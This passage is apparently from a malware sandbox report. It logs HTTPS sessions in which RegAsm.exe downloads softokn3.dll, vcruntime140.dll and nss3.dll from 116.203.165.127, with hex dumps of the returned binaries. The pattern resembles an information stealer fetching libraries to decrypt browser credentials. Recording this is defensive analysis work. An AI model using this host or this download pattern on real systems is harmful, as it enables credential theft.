                                                                                                                                                                                                                                        Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                                                                                                                                                                        Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                                                                                                                                                                        2024-09-21 12:49:08 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                                                                                                                                                                        Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        22192.168.2.949766116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:09 UTC200OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:09 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:09 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 257872
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Last-Modified: Saturday, 21-Sep-2024 12:49:09 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        2024-09-21 12:49:09 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                        2024-09-21 12:49:09 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                                                                                                                                                                        Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                                                                                                                                        2024-09-21 12:49:09 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                                                                                                                                                                        Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                                                                                                                                        2024-09-21 12:49:10 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                                                                                                                                                                        Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                                                                                        2024-09-21 12:49:10 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                                                                                                                                                                        Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                                                                                                                                        2024-09-21 12:49:10 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                                                                                                                                                                        Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                                                                                                                                        2024-09-21 12:49:10 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                                                                                                                                                                        Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                                                                                        2024-09-21 12:49:10 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                                                                                                                                                        Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                                                                                        2024-09-21 12:49:10 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                                                                                                                                                        Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                                                                                        2024-09-21 12:49:10 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                                                                                                                                                        Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        23192.168.2.949767116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:10 UTC204OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:11 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:11 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 80880
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Last-Modified: Saturday, 21-Sep-2024 12:49:11 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        2024-09-21 12:49:11 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                        2024-09-21 12:49:11 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                                                                                                                                                                        Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                                                                                                        2024-09-21 12:49:11 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                                                                                                                                                                        Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                                                                                                        2024-09-21 12:49:11 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                                                                                                                                                                        Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                                                                                                        2024-09-21 12:49:11 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                                                                                                                                                                        Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        24192.168.2.949768116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC196OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:12 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 2046288
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Last-Modified: Saturday, 21-Sep-2024 12:49:12 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        2024-09-21 12:49:12 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
